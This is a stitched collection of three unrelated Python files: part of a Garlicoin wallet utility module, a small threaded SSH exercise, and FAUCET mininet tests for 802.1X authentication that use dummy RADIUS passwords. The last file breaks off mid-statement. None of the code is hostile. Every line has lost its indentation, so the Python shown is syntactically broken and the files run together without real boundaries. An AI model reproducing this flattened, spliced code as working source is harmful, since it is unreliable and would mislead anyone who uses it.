for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Insight': ('https://insight.garli.co.in/',
{'tx': 'tx/', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'LiteCore')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Garlicoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'garlicoin':
raise Exception("Not a Garlicoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Garlicoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='garlicoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
exercise2.py
|
from my_functions import ssh_command
from my_devices import devices_list
from datetime import datetime
import threading
start_time = datetime.now()
for device in devices_list:
thread = threading.Thread(target=ssh_command, args=(device, "show version"))
thread.start()
main_thread = threading.currentThread()
for thread in threading.enumerate():
if thread != main_thread:
thread.join()
print("\nElapsed time: " + str(datetime.now() - start_time))
|
mininet_tests.py
|
#!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-docstring
# pylint: disable=too-many-arguments
# pylint: disable=unbalanced-tuple-unpacking
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
import yaml # pytype: disable=pyi-error
from mininet.log import error
from mininet.util import pmonitor
from clib import mininet_test_base
from clib import mininet_test_util
from clib import mininet_test_topo
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
allow_reuse_address = True
timeout = None
@staticmethod
def handle_error(_request, _client_address):
return
class PostHandler(SimpleHTTPRequestHandler):
@staticmethod
def log_message(_format, *_args):
return
def _log_post(self):
content_len = int(self.headers.get('content-length', 0))
content = self.rfile.read(content_len).decode().strip()
if content and hasattr(self.server, 'influx_log'):
with open(self.server.influx_log, 'a') as influx_log:
influx_log.write(content + '\n')
class InfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
time.sleep(self.server.timeout * 3)
return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
pass
class FaucetUntaggedTest(FaucetTest):
"""Basic untagged VLAN test."""
HOST_NAMESPACE = {}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
EVENT_SOCK_HEARTBEAT = '5'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
def verify_events_log(self, event_log, timeout=10):
required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
for _ in range(timeout):
prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
event_id = None
with open(event_log, 'r') as event_log_file:
for event_log_line in event_log_file.readlines():
event = json.loads(event_log_line.strip())
event_id = event['event_id']
required_events -= set(event.keys())
if prom_event_id == event_id:
return
time.sleep(1)
self.assertEqual(prom_event_id, event_id)
self.assertFalse(required_events)
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
self._enable_event_log()
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.verify_traveling_dhcp_mac()
self.gauge_smoke_test()
self.prometheus_smoke_test()
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_events_log(self.event_log)
class Faucet8021XBaseTest(FaucetTest):
HOST_NAMESPACE = {3: False}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
RADIUS_PORT = None
DOT1X_EXPECTED_EVENTS = []
SESSION_TIMEOUT = 3600
LOG_LEVEL = 'DEBUG'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="microphone"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="admin"
password="megaphone"
}
"""
freeradius_user_conf = """user Cleartext-Password := "microphone"
Session-timeout = {0}
admin Cleartext-Password := "megaphone"
Session-timeout = {0}
vlanuser1001 Cleartext-Password := "password"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222 Cleartext-Password := "milliphone"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept Cleartext-Password := "accept_pass"
Filter-Id = "accept_acl"
filter_id_user_deny Cleartext-Password := "deny_pass"
Filter-Id = "deny_acl"
"""
eapol1_host = None
eapol2_host = None
ping_host = None
nfv_host = None
nfv_intf = None
nfv_portno = None
@staticmethod
def _priv_mac(host_id):
two_byte_port_num = '%04x' % host_id
two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
return '00:00:00:00:%s' % two_byte_port_num_formatted
def _init_faucet_config(self):
self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
nfv_intf = [
intf for intf in last_host_switch_link if intf in switch.intfList()][0]
self.nfv_intf = str(nfv_intf)
nfv_intf = self.nfv_host.intf()
self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
super(Faucet8021XBaseTest, self)._init_faucet_config()
def setUp(self):
super(Faucet8021XBaseTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
self.nfv_portno = self.port_map['port_4']
self.host_drop_all_ips(self.nfv_host)
self.nfv_pids = []
tcpdump_args = '-e -n -U'
self.eapol1_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.radius_log_path = self.start_freeradius()
self.nfv_pids.append(int(self.nfv_host.lastPid))
self._enable_event_log(300)
def tearDown(self, ignore_oferrors=False):
for pid in self.nfv_pids:
self.nfv_host.cmd('kill %u' % pid)
super(Faucet8021XBaseTest, self).tearDown(ignore_oferrors=ignore_oferrors)
def post_test_checks(self):
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_dot1x_events_log()
def verify_dot1x_events_log(self):
def replace_mac(host_no):
replacement_macs = {
'HOST1_MAC': self.eapol1_host.MAC(),
'HOST2_MAC': self.eapol2_host.MAC(),
'HOST3_MAC': self.ping_host.MAC(),
'HOST4_MAC': self.nfv_host.MAC(),
}
return replacement_macs.get(host_no, None)
def insert_dynamic_values(dot1x_expected_events):
for dot1x_event in dot1x_expected_events:
top_level_key = list(dot1x_event.keys())[0]
dot1x_params = {'dp_id': int(self.dpid)}
for key, val in dot1x_event[top_level_key].items():
if key == 'port':
dot1x_params[key] = self.port_map[val]
elif key == 'eth_src':
dot1x_params[key] = replace_mac(val)
dot1x_event[top_level_key].update(dot1x_params)
if not self.DOT1X_EXPECTED_EVENTS:
return
dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
insert_dynamic_values(dot1x_expected_events)
with open(self.event_log, 'r') as event_file:
events_that_happened = []
for event_log_line in event_file.readlines():
if 'DOT1X' not in event_log_line:
continue
event = json.loads(event_log_line.strip())
events_that_happened.append(event['DOT1X'])
for expected_event in dot1x_expected_events:
self.assertTrue(expected_event in events_that_happened,
msg='expected event: {} not in events_that_happened {}'.format(
expected_event, events_that_happened))
def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
wpasup_timeout=180, tcpdump_timeout=15, tcpdump_packets=10,
expect_success=True):
if expect_success:
self.wait_8021x_flows(port_num)
port_labels = self.port_labels(port_num)
success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
tcpdump_filter = 'ether proto 0x888e'
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [
lambda: self.wpa_supplicant_callback(
host, port_num, conf, and_logoff,
timeout=wpasup_timeout,
terminate_wpasupplicant=terminate_wpasupplicant)],
timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
if expect_success:
self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
if not and_logoff:
self.wait_8021x_success_flows(host, port_num)
success = 'Success' in tcpdump_txt
new_success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
new_failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
new_logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
new_dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
new_dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
new_dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
if expect_success != success:
return False
if expect_success and success:
self.assertGreater(new_success_total, success_total)
self.assertGreater(new_dp_success_total, dp_success_total)
self.assertEqual(failure_total, new_failure_total)
self.assertEqual(dp_failure_total, new_dp_failure_total)
logoff = 'logoff' in tcpdump_txt
if logoff != and_logoff:
return False
if and_logoff:
self.assertGreater(new_logoff_total, logoff_total)
return True
self.assertEqual(logoff_total, new_logoff_total)
self.assertEqual(dp_logoff_total, new_dp_logoff_total)
self.assertEqual(dp_success_total, new_dp_success_total)
self.assertGreaterEqual(new_failure_total, failure_total)
self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
return False
def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
for _ in range(retries):
if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
return True
time.sleep(1)
return False
def wait_8021x_flows(self, port_no):
port_actions = [
'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
from_nfv_actions = [
'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
from_nfv_match = {
'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)
def wait_8021x_success_flows(self, host, port_no):
from_host_actions = [
'GOTO_TABLE:1']
from_host_match = {
'in_port': port_no, 'dl_src': host.MAC()}
self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)
def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
self.one_ipv4_ping(
eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
self.assertTrue(
self.try_8021x(
eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)
def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
if os.path.exists(wpa_ctrl_path):
self.terminate_wpasupplicant(host)
for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
try:
os.kill(int(pid), 15)
except (ValueError, ProcessLookupError):
pass
try:
shutil.rmtree(wpa_ctrl_path)
except FileNotFoundError:
pass
log_prefix = host.name + '_'
self.start_wpasupplicant(
host, conf, timeout=timeout,
wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
if and_logoff:
self.wait_for_eap_success(host, wpa_ctrl_path)
self.wait_until_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(), require_host_learned=False)
host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
self.wait_until_no_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
if terminate_wpasupplicant:
self.terminate_wpasupplicant(host)
def terminate_wpasupplicant(self, host):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)
def get_wpa_ctrl_path(self, host):
wpa_ctrl_path = os.path.join(
self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
return wpa_ctrl_path
@staticmethod
def get_wpa_status(host, wpa_ctrl_path):
status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
for line in status.splitlines():
if line.startswith('EAP state'):
return line.split('=')[1].strip()
return None
def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
for _ in range(timeout):
eap_state = self.get_wpa_status(host, wpa_ctrl_path)
if eap_state == 'SUCCESS':
return
time.sleep(1)
self.fail('did not get EAP success: %s' % eap_state)
def wait_for_radius(self, radius_log_path):
self.wait_until_matching_lines_from_file(
r'.*Ready to process requests', radius_log_path)
def start_freeradius(self):
radius_log_path = '%s/radius.log' % self.tmpdir
listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
listen_config = """listen {
type = auth
ipaddr = *
port = %s
}
listen {
type = acct
ipaddr = *
port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
if os.path.isfile('/etc/freeradius/users'):
# Assume we are dealing with freeradius 2 configuration
shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/users' % self.tmpdir
with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(listen_match, '', default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.write(listen_config)
default_site.truncate()
else:
# Assume we are dealing with freeradius >=3 configuration
freerad_version = os.popen(
r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0.9])"').read().rstrip()
freerad_major_version = freerad_version.split(' ')[1]
shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
'%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+') as default_site:
default_config = default_site.read()
default_config = re.sub(
listen_match, '', default_config)
default_config = re.sub(
r'server default {', 'server default {\n'+listen_config, default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.truncate()
with open(users_path, 'w') as users_file:
users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
with open('%s/freeradius/clients.conf' % self.tmpdir, 'w') as clients:
clients.write("""client localhost {
ipaddr = 127.0.0.1
secret = SECRET
}""")
with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+') as innertunnel_site:
tunnel_config = innertunnel_site.read()
listen_config = """listen {
ipaddr = 127.0.0.1
port = %d
type = auth
}""" % (self.RADIUS_PORT + 2)
tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
innertunnel_site.seek(0)
innertunnel_site.write(tunnel_config)
innertunnel_site.truncate()
os.system('chmod o+rx %s' % self.root_tmpdir)
os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
300))
self.wait_for_radius(radius_log_path)
return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBaseTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
SESSION_TIMEOUT = 3600
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.verify_host_success(
self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBaseTest):
"""Failure due to incorrect identity/password"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="wrongpassword"
}
"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]
def test_untagged(self):
self.assertFalse(
self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBaseTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no4 = self.port_map['port_4']
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no1)
# self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no4)
# self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
self.set_port_up(port_no4)
self.wait_8021x_flows(port_no1)
# check only have rules for port 2 installed, after the NFV port comes up
self.set_port_down(port_no1)
self.flap_port(port_no4)
self.wait_8021x_flows(port_no2)
# no portno1
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
# When the port goes down, and up the host should not be authenticated anymore.
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
# terminate so don't automatically reauthenticate when port goes back up.
self.terminate_wpasupplicant(self.eapol1_host)
self.flap_port(port_no1)
self.wait_8021x_flows(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
for _ in range(2):
self.set_port_up(port_no1)
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.set_port_down(port_no1)
self.assertFalse(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
wpa_status = self.get_wpa_status(
self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
self.assertNotEqual('SUCCESS', wpa_status)
# Kill supplicant so cant reply to the port up identity request.
self.terminate_wpasupplicant(self.eapol1_host)
self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBaseTest):
def test_untagged(self):
port_no1 = self.port_map['port_1']
# start wpa sup, logon, then send id request. should then be 2 success.
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False,
tcpdump_timeout=180, tcpdump_packets=6))
self.set_port_down(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
